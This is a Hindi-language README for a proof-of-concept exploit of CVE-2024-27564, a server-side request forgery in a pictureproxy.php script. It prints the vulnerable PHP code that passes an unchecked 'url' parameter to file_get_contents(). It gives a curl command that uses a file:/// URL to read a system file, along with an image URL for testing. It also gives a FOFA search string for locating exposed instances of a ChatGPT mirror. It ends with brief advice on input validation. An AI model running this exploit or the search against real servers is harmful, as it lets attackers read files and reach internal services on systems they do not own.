
प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट CVE-2024-27564 के लिए, जो pictureproxy.php में बिना सत्यापन के URL पैरामीटर के माध्यम से SSRF का प्रदर्शन करता है। इसमें curl-आधारित परीक्षण और कमजोर इंस्टेंस के लिए FOFA खोज शामिल है।
यह परियोजना pictureproxy.php फ़ाइल में सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) कमज़ोरी को प्रदर्शित करती है।
pictureproxy.php में एक कमज़ोरी दूरस्थ हमलावरों को url पैरामीटर में URL इंजेक्ट करके मनमाने अनुरोध करने की अनुमति देती है। इस SSRF कमज़ोरी का बिना प्रमाणीकरण के शोषण किया जा सकता है, जो इसे विशेष रूप से खतरनाक बनाता है।
कमज़ोर कोड pictureproxy.php फ़ाइल में है। समस्या इसलिए होती है क्योंकि फ़ंक्शन url पैरामीटर को ठीक से मान्य नहीं करता। $_GET['url'] वेरिएबल को file_get_contents() फ़ंक्शन में पास किया जाता है, जो निर्दिष्ट URL से सामग्री लाता है। इससे SSRF हो सकता है।
यहाँ एक सरल प्रमाण की अवधारणा है जो दिखाती है कि कमज़ोरी का शोषण कैसे किया जा सकता है:
<?php
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}
कमज़ोरी का परीक्षण करने के लिए, आप निम्नलिखित curl कमांड का उपयोग कर सकते हैं:
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
एक ओपन रीडायरेक्ट कमज़ोरी का उपयोग करके परीक्षण:
https://64.media.tumblr.com/f07b73b374dc2ff6d5e4dbf39d2a6467/tumblr_nvani31DCm1u5url1o1_1280.jpg
बैनर
"title="ChatGPT个人专用版""
यह परियोजना SSRF कमज़ोरियों से बचने के लिए उपयोगकर्ता इनपुट को ठीक से मान्य करने के महत्व को उजागर करती है। हमेशा सुनिश्चित करें कि URL जैसे पैरामीटर को संसाधित करने से पहले पूरी तरह से जांचा जाए।